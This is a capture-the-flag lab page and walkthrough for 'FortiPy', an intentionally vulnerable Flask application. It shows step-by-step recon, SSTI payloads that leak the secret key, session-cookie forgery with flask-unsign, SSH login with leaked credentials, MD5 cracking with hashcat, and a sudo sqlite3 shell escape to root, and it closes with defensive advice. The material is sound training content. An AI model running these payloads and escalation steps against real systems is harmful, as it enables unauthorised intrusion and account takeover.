Lab Icon

FortiPy

🔥 Can you penetrate this corporate fortress and achieve total system control?

Hard 13 Dec 2025 Free Access Solution Available

A mysterious corporate application called TechSphere has caught your attention. 🕵️ Behind its professional facade lies a complex security landscape waiting to be explored. This multi-layered penetration testing scenario will challenge your reconnaissance skills, exploitation techniques, and system analysis capabilities. 💻 Are you ready to navigate through the corporate security infrastructure and demonstrate your expertise? 🏆

2
Flags
70
Points
33%
Success Rate
Start Your Challenge

Launch your dedicated machine to begin hacking

~1-2 min setup
Dedicated server
Private instance
Industry standard
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

Hard

🔐 FortiPy - Complete Solution

Objective: Exploit a Flask web application through multiple attack vectors including SSTI, session manipulation, SSH access, database enumeration, hash cracking, and privilege escalation to achieve root access.
🔍 Step 1: Initial Network Reconnaissance

Begin by scanning the target system to identify available services and potential attack vectors:

nmap -sC -sV -Pn <target-ip>

The scan reveals the following services:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0 (protocol 2.0)
80/tcp open http Werkzeug httpd 3.1.3 (Python 3.12.11)
|_http-title: TechSphere Innovations
|_http-server-header: Werkzeug/3.1.3 Python/3.12.11

Key Findings:

  • SSH service on port 22 (OpenSSH 10.0)
  • Python Flask web application on port 80 using Werkzeug
  • Application title: "TechSphere Innovations"
🔍 Step 2: Web Application Initial Access

Navigate to http://<target-ip> to access the TechSphere web application. You'll see a corporate portal with registration and login functionality.

2.1: Create User Account

Click on "Get Started" or "Register" to create a new account:

Username: testuser
Password: password123

Complete the registration process to create your account.

2.2: Login to Access Dashboard

After registration, login with your credentials to access the user dashboard. This step is crucial as it provides you with a valid session cookie that you'll need for later exploitation.

Once logged in, you'll see several features:

  • Console: Limited command execution (ls, pwd, whoami only)
  • Upload: File upload functionality (accepts only .txt files - no use for us)
  • Debug: Debug logs section
  • Dashboard: Main user interface
🔍 Step 3: Directory Enumeration

Use directory busting to discover hidden endpoints that aren't visible in the main navigation:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

This reveals several important endpoints:

  • /member_login - Alternative login interface
  • /welcome - Welcome page with user parameter
  • /sshadmin - SSH administration panel (requires admin access)
🔍 Step 4: Server-Side Template Injection Discovery
4.1: Access Member Login

Navigate to http://<target-ip>/member_login. This page presents a different login interface with a username field.

4.2: Test for SSTI Vulnerability

Enter a basic SSTI payload in the username field:

{{7*7}}

Submit the form and observe that you're redirected to /welcome with your input reflected. If the page displays "49" instead of "{{7*7}}", you've confirmed SSTI vulnerability.

4.3: Extract Flask Configuration

Use an advanced SSTI payload to extract Flask application configuration:

{{config.items()}}

This payload reveals sensitive configuration information including the Flask SECRET_KEY:

SECRET_KEY: evjcLayPlvdm1UAuNZqpZeVVyyJzYKB5cpLFvUbNMv6FeEYQM4
🔍 Step 5: Flask Session Cookie Manipulation
5.1: Capture Current Session Cookie

Open browser Developer Tools (F12) and navigate to the Application/Storage tab. Locate the session cookie (usually named "session") and copy its value.

5.2: Decode Current Cookie

Use flask-unsign to decode your current session cookie and understand its structure:

flask-unsign --decode --cookie "your_session_cookie_here" --secret "evjcLayPlvdm1UAuNZqpZeVVyyJzYKB5cpLFvUbNMv6FeEYQM4"

This reveals the current session structure, typically showing your user role as "user".

5.3: Forge Administrative Cookie

Create a new session cookie with administrative privileges:

flask-unsign --sign --secret "evjcLayPlvdm1UAuNZqpZeVVyyJzYKB5cpLFvUbNMv6FeEYQM4" --cookie '{"role": "admin", "user": "admin"}'
5.4: Replace Session Cookie

In the browser Developer Tools:

  1. Navigate to Application/Storage → Cookies
  2. Find the session cookie
  3. Replace its value with the forged administrative cookie
  4. Refresh the page
🔍 Step 6: Access SSH Administration Panel

With your forged admin cookie, navigate to http://<target-ip>/sshadmin. You should now have access to the SSH administration panel that displays a list of SSH credentials for users devadmin0 through devadmin24.

The panel reveals multiple SSH credentials, but only one is valid:

Valid Credential:
Username: devadmin14
Password: secureADMINpass001
🔍 Step 7: SSH Access and User Flag
7.1: Connect via SSH

Use the discovered credentials to connect to the target system:

ssh devadmin14@<target-ip>

When prompted, enter the password: secureADMINpass001

7.2: Retrieve User Flag

Once connected, explore the home directory and retrieve the user flag:

ls -la /home/devadmin14/
cat /home/devadmin14/flag-user.txt
🔍 Step 8: Database Configuration Discovery
8.1: Explore Home Directory

Examine the devadmin14 home directory for additional files:

ls -la /home/devadmin14/
cat /home/devadmin14/db_config.ini

This reveals database credentials:

Database Credentials:
Username: sqluser
Password: sqlpass123
8.2: Switch to SQL User

Use the discovered credentials to switch to the sqluser account:

su sqluser

Enter the password: sqlpass123

🔍 Step 9: Database Enumeration
9.1: Access SQLite Database

Locate and access the SQLite database:

find / -name "*.db" 2>/dev/null
sqlite3 /opt/database/database.db
9.2: Enumerate Database Tables

Within the SQLite prompt, explore the database structure:

.tables
.schema oldcreds
SELECT * FROM oldcreds;

This reveals several user password hashes, including:

sqladmin hash: 6e70d06760276024943e0ec1339ef527
9.3: Extract Target Hash

Focus on the sqladmin user hash:

SELECT * FROM oldcreds WHERE user='sqladmin';
🔍 Step 10: Hash Cracking
10.1: Identify Hash Type

The hash appears to be MD5 (32 characters, hexadecimal). Verify using hash identification tools if needed:

echo "6e70d06760276024943e0ec1339ef527" | hashid
10.2: Crack the Hash

Use hashcat to crack the MD5 hash:

echo "6e70d06760276024943e0ec1339ef527" > sqladmin_hash.txt
hashcat -m 0 -a 0 sqladmin_hash.txt /usr/share/wordlists/rockyou.txt

The cracked password is: sqlvb60foxpro

10.3: Switch to SQL Admin

Use the cracked password to switch to the sqladmin account:

su sqladmin

Enter the password: sqlvb60foxpro

🔍 Step 11: Privilege Escalation to Root
11.1: Check Sudo Privileges

Examine what sudo privileges the sqladmin user has:

sudo -l

This reveals that sqladmin can run sqlite3 with sudo privileges:

sqladmin ALL=(ALL) NOPASSWD: /usr/bin/sqlite3 /opt/database/database.db
11.2: Exploit SQLite Shell Escape

Use the sudo sqlite3 permission to escalate privileges:

sudo sqlite3 /opt/database/database.db

Within the SQLite prompt, use the shell escape feature:

.shell /bin/sh
11.3: Verify Root Access

Confirm you have root privileges:

whoami
id
ls -la /root/
11.4: Retrieve Root Flag

Access and retrieve the root flag:

cat /root/flag-root.txt
📚 Key Learning Points
  • SSTI Exploitation: Server-Side Template Injection can lead to sensitive configuration disclosure
  • Flask Security: Exposed secret keys enable session cookie manipulation
  • Directory Enumeration: Hidden endpoints often contain administrative functionality
  • Session Management: Improper session validation allows privilege escalation
  • Credential Reuse: Database credentials found in configuration files enable lateral movement
  • Hash Cracking: Weak passwords in databases can be cracked for further access
  • Sudo Misconfigurations: Overprivileged sudo rules enable privilege escalation
  • Binary Exploitation: SQLite's shell escape feature provides command execution
🛡️ Security Implications
  • Input Validation: Properly sanitize user input to prevent SSTI attacks
  • Secret Management: Never expose Flask secret keys through SSTI or other vulnerabilities
  • Session Security: Implement proper session validation and role checking
  • Credential Storage: Avoid storing database credentials in plaintext configuration files
  • Password Policies: Enforce strong password policies and avoid weak passwords
  • Sudo Configuration: Follow principle of least privilege for sudo rules
  • Binary Restrictions: Be cautious when granting sudo access to powerful binaries like sqlite3
Attack Chain Summary:
Web Registration → SSTI Discovery → Flask Secret Extraction → Cookie Manipulation → Admin Access → SSH Credentials → Database Access → Hash Cracking → Sudo Exploitation → Root Shell